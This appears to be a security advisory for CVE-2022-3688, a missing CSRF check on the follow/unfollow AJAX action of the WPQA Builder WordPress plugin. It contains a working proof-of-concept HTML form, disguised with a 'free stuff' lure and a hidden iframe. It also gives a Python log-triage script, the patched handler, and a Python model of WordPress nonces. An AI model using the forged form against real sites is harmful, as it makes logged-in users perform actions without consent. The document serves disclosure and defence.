A critical security vulnerability, assigned CVE-2022-3688, has been identified in the WPQA Builder WordPress plugin before version 5.9. The vulnerability is the absence of Cross-Site Request Forgery (CSRF) protection on the follow and unfollow actions for user profiles. An attacker who lures a logged-in user to a malicious page can make that user's browser perform follow or unfollow actions on the vulnerable site without the user's knowledge.

Exploit Details

A CSRF vulnerability occurs when an attacker is able to trick a victim into performing unwanted actions on a web application while the victim is authenticated, because the browser attaches the victim's session cookie to requests regardless of which site issued them. In the case of the WPQA Builder WordPress plugin, the issue lies in the absence of a CSRF protection check when users follow or unfollow other users on a website using the plugin.

The following code snippet demonstrates the vulnerability in the plugin: the _wpnonce parameter, which WordPress uses for CSRF protection, is never checked before the follow or unfollow action is performed:

function wpqa_follow_unfollow() {
    // get_current_user_id() is derived from the login cookie, which the browser
    // attaches to a cross-site POST exactly as it would to a same-site one
    $user_id = (int)get_current_user_id();
    $following_you_id = (int)$_POST['following_not'];
    ...
    // The CSRF token check is missing here: nothing proves the request was issued
    // by the plugin's own page, so a form on any origin can trigger a follow/unfollow
    if ($_POST['following'] == 'follow') {
        ...
    } else if ($_POST['following'] == 'unfollow') {
        ...
    }
}
// wp_ajax_* hooks run only for logged-in users, which is precisely the
// precondition a CSRF attack relies on
add_action('wp_ajax_wpqa_follow_unfollow','wpqa_follow_unfollow');

An attacker could exploit this vulnerability by creating a malicious website with a specially crafted form that, when submitted, sends a request to the vulnerable WordPress site to follow or unfollow users without the victim's consent.

For instance, the attacker could craft the following HTML form to abuse the vulnerability:

<form action="https://vulnerable-wp-site.tld/wp-admin/admin-ajax.php" method="POST" target="hidden_iframe">
    <input type="hidden" name="action" value="wpqa_follow_unfollow" />
    <input type="hidden" name="following_not" value="USER_ID_TO_FOLLOW_OR_UNFOLLOW" />
    <input type="hidden" name="following" value="follow" />
    <input type="submit" value="Click here for free stuff!" />
</form>
<iframe name="hidden_iframe" style="display:none;"></iframe>
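A cross-site submission of the form above leaves a trace in the web server's access log: a POST to admin-ajax.php whose Referer belongs to a foreign origin (browsers under the default strict-origin-when-cross-origin policy still send the attacker's origin). The following Python script, an added example that is not part of the original advisory or of the plugin, flags such requests in constructed log lines in the Apache/nginx "combined" format. It assumes the site host name from the example form (vulnerable-wp-site.tld) and treats a missing Referer as inconclusive rather than suspicious, since many legitimate clients omit it.

```python
import re
from urllib.parse import urlsplit

# Host name of the protected site, taken from the advisory's example form
SITE_HOST = "vulnerable-wp-site.tld"

# Apache/nginx "combined" format:
#   ip - user [time] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def referer_host(referer):
    """Lower-cased host of a Referer value, or None when the header was absent."""
    if referer in ("", "-"):
        return None
    return urlsplit(referer).hostname or None


def suspicious_ajax_posts(lines, site_host=SITE_HOST):
    """Return (client ip, referer) for every POST to admin-ajax.php whose Referer
    names a different host than the site itself. A missing Referer is ignored
    on purpose: it is too common for legitimate traffic to be a useful signal,
    so this is a triage heuristic, not proof of an attack."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        if not m["path"].startswith("/wp-admin/admin-ajax.php"):
            continue
        host = referer_host(m["referer"])
        if host is not None and host != site_host.lower():
            hits.append((m["ip"], m["referer"]))
    return hits


# Constructed sample lines: one same-origin AJAX call, one cross-origin POST of
# the kind the hidden form produces, an unrelated GET, and a POST without Referer
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Nov/2022:11:15:00 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" '
    '200 27 "https://vulnerable-wp-site.tld/profile/alice/" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Nov/2022:11:16:03 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" '
    '200 27 "https://free-stuff.example/" "Mozilla/5.0"',
    '203.0.113.9 - - [21/Nov/2022:11:16:04 +0000] "GET /wp-content/themes/x/style.css HTTP/1.1" '
    '200 512 "https://free-stuff.example/" "Mozilla/5.0"',
    '198.51.100.2 - - [21/Nov/2022:11:17:10 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" '
    '200 27 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for ip, ref in suspicious_ajax_posts(SAMPLE_LOG):
        print(f"cross-origin admin-ajax POST from {ip}, referer {ref}")
```

The access log does not contain the POST body, so the action name cannot be confirmed from this data alone; correlate a hit with the follow/unfollow records in the plugin's tables (or with application-level logging of the `action` parameter) before treating it as an incident. The log check complements the nonce fix in 5.9 rather than replacing it: WordPress's nonce verification does not inspect the Referer header, and attackers can sometimes suppress it.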

Mitigation and Recommendations

To mitigate this vulnerability, it is strongly recommended to update the WPQA Builder WordPress plugin to the latest version (5.9 or later) if not already done. The developers have addressed this vulnerability by adding the necessary CSRF protection in the affected functionality.

The updated code snippet in version 5.9 and above is as follows:

function wpqa_follow_unfollow() {
    $user_id = (int)get_current_user_id();
    $following_you_id = (int)$_POST['following_not'];
    ...
    // The CSRF token check has been added: the value in $_POST['_wpnonce'] must have
    // been generated for the 'wpqa_follow_unfollow_nonce' action and the current
    // user's session, which a page on another origin cannot obtain. With the third
    // argument set to true, a missing or invalid nonce ends the request with -1 and
    // HTTP 403 before any follow/unfollow change is made
    check_ajax_referer('wpqa_follow_unfollow_nonce', '_wpnonce', true);

    if ($_POST['following'] == 'follow') {
        ...
    } else if ($_POST['following'] == 'unfollow') {
        ...
    }
}
add_action('wp_ajax_wpqa_follow_unfollow','wpqa_follow_unfollow');
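To show why the single added line closes the hole, here is a self-contained Python model of the WordPress nonce scheme that check_ajax_referer() relies on, followed by a model of the patched handler. This is an added example, not the plugin's code and not WordPress's own PHP: it reproduces the documented mechanics of wp_nonce_tick(), wp_create_nonce() and wp_verify_nonce() (a tick that advances every half-lifetime, HMAC-MD5 over tick|action|user id|session token, ten characters kept, current and previous tick accepted). The salt, the victim's session token and the follow_unfollow() handler are constructed or hypothetical; the input validation in the handler goes beyond what the advisory's snippet shows and is marked as an assumption.

```python
import hashlib
import hmac
import math
import time

# Constructed salt: WordPress derives the real one from NONCE_KEY/NONCE_SALT in
# wp-config.php. For the model it only needs to be secret and stable.
NONCE_SALT = b"constructed-nonce-salt-for-the-model"
NONCE_LIFE = 24 * 60 * 60              # WordPress default nonce lifetime: one day
ACTION = "wpqa_follow_unfollow_nonce"  # action string used by the patched handler


def nonce_tick(now=None):
    """wp_nonce_tick(): a counter that advances every half-lifetime, so a nonce
    stays valid for between 12 and 24 hours."""
    now = time.time() if now is None else now
    return math.ceil(now / (NONCE_LIFE / 2))


def _nonce_for_tick(tick, action, user_id, session_token):
    """Ten hex characters of HMAC-MD5 over tick|action|uid|session token."""
    msg = f"{tick}|{action}|{user_id}|{session_token}".encode()
    return hmac.new(NONCE_SALT, msg, hashlib.md5).hexdigest()[-12:][:10]


def create_nonce(action, user_id, session_token, now=None):
    """wp_create_nonce(): the plugin's own page script is handed this value and
    sends it back as _wpnonce. A foreign origin never sees the session token
    (it lives in the victim's cookie), so it cannot compute the nonce."""
    return _nonce_for_tick(nonce_tick(now), action, user_id, session_token)


def verify_nonce(nonce, action, user_id, session_token, now=None):
    """wp_verify_nonce(): 1 if minted in the current tick, 2 if in the previous
    one, False otherwise. Logged-out users are modelled as always failing."""
    if not nonce or not user_id:
        return False
    tick = nonce_tick(now)
    given = str(nonce).encode("utf-8", "replace")
    for age, t in ((1, tick), (2, tick - 1)):
        expected = _nonce_for_tick(t, action, user_id, session_token).encode()
        if hmac.compare_digest(given, expected):  # constant-time comparison
            return age
    return False


def follow_unfollow(post, session, now=None):
    """Hypothetical model of the patched wpqa_follow_unfollow() handler.
    `session` stands for the login state WordPress derives from the auth cookie,
    which the browser also attaches to a cross-site POST; that is why being
    logged in is not enough and the nonce is required on top of it."""
    user_id = session.get("user_id", 0)
    token = session.get("token", "")
    # check_ajax_referer('wpqa_follow_unfollow_nonce', '_wpnonce', true):
    # WordPress answers -1 with HTTP 403 and stops here when the nonce is bad
    if not verify_nonce(post.get("_wpnonce", ""), ACTION, user_id, token, now):
        return {"status": 403, "error": "nonce check failed"}
    # Assumed extra validation, not shown in the advisory's snippet: a numeric
    # target other than the caller and a known operation
    target = post.get("following_not", "")
    if not target.isdigit() or int(target) == user_id:
        return {"status": 400, "error": "invalid target"}
    if post.get("following") not in ("follow", "unfollow"):
        return {"status": 400, "error": "invalid operation"}
    return {"status": 200, "op": post["following"], "target": int(target)}


def demo(now=1_700_000_000):
    """Constructed victim session. Returns the status of the hidden form's POST
    (no nonce, cookie attached by the browser) and of the plugin's own POST."""
    victim = {"user_id": 7, "token": "constructed-session-token"}
    forged = {"action": "wpqa_follow_unfollow", "following_not": "42", "following": "follow"}
    legit = dict(forged, _wpnonce=create_nonce(ACTION, 7, victim["token"], now))
    return (follow_unfollow(forged, victim, now)["status"],
            follow_unfollow(legit, victim, now)["status"])


if __name__ == "__main__":
    print(demo())  # (403, 200)
```

The model makes the two properties of the fix visible: the nonce is bound to the user's session token and to the action name, so a nonce minted for another user or for a different action is rejected, and it expires after at most a day, so a value that does leak has a short shelf life. In real WordPress the page-side half of the pattern is wp_create_nonce() passed to the script via wp_localize_script() and posted back as _wpnonce; the handler half is exactly the check_ajax_referer() line added in 5.9.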

In general, it is also suggested to follow best security practices when configuring and maintaining your WordPress websites. Those steps may include using strong and unique passwords, keeping WordPress, plugins, and themes up to date, leveraging security plugins, and utilizing reputable hosting providers.

Original References

- WordPress Vulnerability Database: https://wpvulndb.com/vulnerabilities/13742
- CVE Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3688

Conclusion

The CVE-2022-3688 CSRF vulnerability found in the WPQA Builder WordPress plugin before 5.9 could potentially allow attackers to make logged-in users perform unauthorized follow and unfollow actions on other users via CSRF attacks. Keeping your WordPress installation, plugins, and themes up to date is crucial in maintaining a secure online environment for your users.

Timeline

Published on: 11/21/2022 11:15:00 UTC
Last modified on: 11/23/2022 15:47:00 UTC